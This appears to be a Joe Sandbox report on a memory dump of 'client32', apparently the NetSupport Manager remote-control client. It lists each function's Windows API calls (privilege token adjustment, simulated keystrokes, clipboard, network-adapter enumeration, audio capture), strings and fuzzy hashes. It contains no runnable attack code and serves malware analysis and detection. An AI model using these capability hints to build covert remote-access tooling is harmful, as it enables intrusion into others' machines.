Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6

Strings

hMap, xrefs: 1108949D
..\ctl32\Errorhan.cpp, xrefs: 11089498, 110894C7

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLock
String ID: ..\ctl32\Errorhan.cpp$hMap
API String ID: 2752051264-327499879
Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1

Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 11113387
GetTickCount.KERNEL32 ref: 111133A1

Strings

nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
..\ctl32\Remote.cpp, xrefs: 111133D4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountIconicTick
String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
API String ID: 1307367305-2838568823
Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A

Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON

Download Yara Rule

APIs

IsIconic.USER32(000000FF), ref: 110C10AD
ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
BringWindowToTop.USER32(000000FF), ref: 110C10C7
GetCurrentThreadId.KERNEL32 ref: 110C10E8

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$BringCurrentIconicShowThread
String ID:
API String ID: 4184413098-0
Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0

Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,B6DE5DE1,00080000,00000000,?), ref: 1109D88D
OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
AdjustTokenPrivileges.ADVAPI32(00000000), ref: 1109D8C9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0

Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ControlDevicekeybd_event
String ID:
API String ID: 1421710848-0
Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0

Function 110335A0 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON

Download Yara Rule

APIs

GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
SetClipboardData.USER32(00000000,00000000), ref: 11033612

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Clipboard$DataFormatName
String ID:
API String ID: 3172747766-0
Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6

Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60

Function 1101DB70 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 361windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101DC00
GetWindowTextLengthA.USER32(00000000), ref: 1101DC09
SendMessageA.USER32(00000000,000000B1,00000001,00000001), ref: 1101DC1E
_memset.LIBCMT ref: 1101DC2F
SendMessageA.USER32(00000000,0000043A,00000000,?), ref: 1101DC56
SendMessageA.USER32(00000000,0000043A,00000001,?), ref: 1101DC6E
SendMessageA.USER32(00000000,00000444,00000001,?), ref: 1101DCD0
LoadBitmapA.USER32(00000000,000013CD), ref: 1101DD0F
GetObjectA.GDI32(00000000,00000018,?), ref: 1101DD25

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Strings

IsA(), xrefs: 1101DE6D
DisableSmileys, xrefs: 1101DCE7
m_hWnd, xrefs: 1101DD41, 1101DF5A
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101DD3C, 1101DF55
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1101DE68
Chat, xrefs: 1101DCEC

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$BitmapItemLengthLoadObjectTextWindow__strdup_free_memset
String ID: Chat$DisableSmileys$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3923228642-2891806625
Opcode ID: f1e199e6effe706d7c36bc5c6e6f87f746a1d0f035c8948919da1fd46115f877
Instruction ID: c13073a30208fefd3b033e8a449f5569f8ab98db58b479f73fba8d4c12dbe919
Opcode Fuzzy Hash: f1e199e6effe706d7c36bc5c6e6f87f746a1d0f035c8948919da1fd46115f877
Instruction Fuzzy Hash: 49D1A775E00229ABEB24DF64CC85F9EB7B4BF44704F0081D9F919AB284DB74A944CF60

Function 1103D530 Relevance: 56.4, APIs: 14, Strings: 18, Instructions: 385libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(netapi32.dll), ref: 1103D576
GetProcAddress.KERNEL32(00000000,Netbios), ref: 1103D590
_memset.LIBCMT ref: 1103D5AB
_memset.LIBCMT ref: 1103D605
_memset.LIBCMT ref: 1103D635
wsprintfA.USER32 ref: 1103D6EE
FreeLibrary.KERNEL32(?), ref: 1103D747
FreeLibrary.KERNEL32(?), ref: 1103D779
LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 1103D793
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 1103D7AF
_malloc.LIBCMT ref: 1103D811
wsprintfA.USER32 ref: 1103D8C8

Strings

IPHLPAPI.DLL, xrefs: 1103D78E
%02x%02x%02x%02x%02x%02x, xrefs: 1103D6E8, 1103D8BC
Info. macaddr[%d]=%s, ipaddr=%hs/%hs, xrefs: 1103D912
TCPIP, xrefs: 1103D564
pGetAdaptersInfo, xrefs: 1103D7C5
VIRTNET, xrefs: 1103D8E9
Info. Netbios macaddr=%s, xrefs: 1103D70F
Info. Set MacAddr to %s, xrefs: 1103DA2B
%d adapters in chain, %d adapters by size, xrefs: 1103D851
3, xrefs: 1103D697
Netbios, xrefs: 1103D58A
ListenAddress, xrefs: 1103D55F
netapi32.dll, xrefs: 1103D571
GetAdaptersInfo, xrefs: 1103D7A9
Warning. Netbios() returned x%x, xrefs: 1103D74F
* , xrefs: 1103D647
CLTCONN.CPP, xrefs: 1103D7C0
Info. Unable to load netapi32, xrefs: 1103D781

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
API String ID: 2942389153-3574733319
Opcode ID: a1f09aa51e896bd3823c6bcd84ba5b8c2eceb3d4fedcf053763cb51e93d6f7e9
Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
Opcode Fuzzy Hash: a1f09aa51e896bd3823c6bcd84ba5b8c2eceb3d4fedcf053763cb51e93d6f7e9
Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61

Function 1106FA30 Relevance: 52.8, APIs: 24, Strings: 6, Instructions: 333sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,B6DE5DE1,00000000,?,?), ref: 1106FAB6
EnterCriticalSection.KERNEL32(?,B6DE5DE1,00000000,?,?), ref: 1106FAC9
LeaveCriticalSection.KERNEL32(?), ref: 1106FACC
EnterCriticalSection.KERNEL32(?), ref: 1106FAD9
LeaveCriticalSection.KERNEL32(?), ref: 1106FADC
EnterCriticalSection.KERNEL32(?), ref: 1106FAE6
LeaveCriticalSection.KERNEL32(?), ref: 1106FAE9
EnterCriticalSection.KERNEL32(?), ref: 1106FB0A
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106FB54
wsprintfA.USER32 ref: 1106FBA0
InterlockedDecrement.KERNEL32(?), ref: 1106FC29
InterlockedDecrement.KERNEL32(?), ref: 1106FC38
InterlockedDecrement.KERNEL32(?), ref: 1106FC41
InterlockedDecrement.KERNEL32(?), ref: 1106FC59
InterlockedDecrement.KERNEL32(?), ref: 1106FC77
InterlockedDecrement.KERNEL32(?), ref: 1106FCAE

Strings

DestroyThread finished, NULL lid, xrefs: 1106FCD0
DestroyThread finished, cid==-1, xrefs: 1106FC7D
*slot == c, xrefs: 1106FBD3
..\ctl32\Connect.cpp, xrefs: 1106FBB1, 1106FBCE
slot %d, ppConn=%x, *ppConn=%x, c=%x, xrefs: 1106FB9A
DestroyThread finished, lwr==upr, xrefs: 1106FE54

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$DecrementInterlocked$EnterLeave$Sleepwsprintf
String ID: *slot == c$..\ctl32\Connect.cpp$DestroyThread finished, NULL lid$DestroyThread finished, cid==-1$DestroyThread finished, lwr==upr$slot %d, ppConn=%x, *ppConn=%x, c=%x
API String ID: 2291750367-2321163575
Opcode ID: 12f98f6488415fb688ee6300e9a0721148dc2152aadbd668d398b29590ba7bfb
Instruction ID: ff82d8e7c5c4f3c6189d0088e28ac8b18321fd710e53c2486201723fa68f6a76
Opcode Fuzzy Hash: 12f98f6488415fb688ee6300e9a0721148dc2152aadbd668d398b29590ba7bfb
Instruction Fuzzy Hash: D9D1D175E002599FDB15DF64C894F9EB7F9AF44308F0481E9E81AAB245DB30AE41CFA1

Function 1100BDB0 Relevance: 52.8, APIs: 26, Strings: 4, Instructions: 254sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000000FF,B6DE5DE1,?,00000000,00000000,1100CEA3,0000000F,Error. acmStreamOpen (out) ret %d,00000000), ref: 1100BDE4
EnterCriticalSection.KERNEL32(?), ref: 1100BE23
waveInStop.WINMM(?), ref: 1100BE34
waveInReset.WINMM(?), ref: 1100BE3B
LeaveCriticalSection.KERNEL32(?), ref: 1100BE42
SetEvent.KERNEL32(?), ref: 1100BE57
Sleep.KERNEL32(00000032), ref: 1100BE67
EnterCriticalSection.KERNEL32(?), ref: 1100BE79
waveInUnprepareHeader.WINMM(?,?,00000020), ref: 1100BE9D
_free.LIBCMT ref: 1100BEAA
waveInClose.WINMM(?), ref: 1100BEDB
LeaveCriticalSection.KERNEL32(?), ref: 1100BEEF
EnterCriticalSection.KERNEL32(?), ref: 1100BF0B
waveOutReset.WINMM(00000000,Audio,DisableReset,00000000,00000000), ref: 1100BF3E
waveOutReset.WINMM(?,Audio,DisableReset,00000000,00000000), ref: 1100BF4B
GetTickCount.KERNEL32 ref: 1100BF5D

Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,B6DE5DE1,?,00000000,00000000), ref: 1100AD54
Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45

GetTickCount.KERNEL32 ref: 1100BF9E
GetTickCount.KERNEL32 ref: 1100BFB3
Sleep.KERNEL32(00000000), ref: 1100BFF3
waveOutClose.WINMM(00000000,Audio,SleepBeforeClose,?,00000000,Audio,DisableReset,00000000,00000000), ref: 1100C010
